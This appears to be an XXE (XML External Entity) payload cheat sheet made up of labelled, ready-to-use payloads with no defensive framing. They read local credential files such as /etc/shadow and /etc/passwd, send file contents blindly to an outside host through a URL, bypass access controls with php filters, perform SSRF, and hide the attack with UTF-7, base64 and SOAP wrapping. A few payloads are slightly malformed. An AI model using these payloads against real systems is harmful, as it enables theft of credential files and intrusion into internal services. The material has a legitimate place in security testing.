<!--?xml version="1.0" ?--><!DOCTYPE replace [<!ENTITY example "Doe"> ]><userInfo><firstName>John</firstName><lastName>&example;</lastName></userInfo>
XXE: File Disclosure
<!--?xml version="1.0" ?--><!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]><userInfo><firstName>John</firstName><lastName>&ent;</lastName></userInfo>
<?xml version="1.0"?><!DOCTYPE foo [ <!ELEMENT foo (#ANY)><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
XXE: Blind Local File Inclusion Example (When first case doesn't return anything.)
<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT foo (#ANY)><!ENTITY % xxe SYSTEM "file:///etc/passwd"><!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>
XXE: Access Control Bypass (Loading Restricted Resources - php example)
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]><foo><result>∾</result></foo>
XXE:SSRF ( Server Side Request Forgery ) Example
<?xml version="1.0"?><!DOCTYPE foo [ <!ELEMENT foo (#ANY)><!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>
XXE: (Remote Attack - Through External Xml Inclusion) Exmaple
<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY test SYSTEM "https://example.com/entity1.xml">]><lolz><lol>3..2..1...&test<lol></lolz>
XXE: UTF-7 Exmaple
<?xml version="1.0" encoding="UTF-7"?>+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA++ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
XXE: Base64 Encoded
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
XXE: XXE inside SOAP Example
<soap:Body><foo> <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>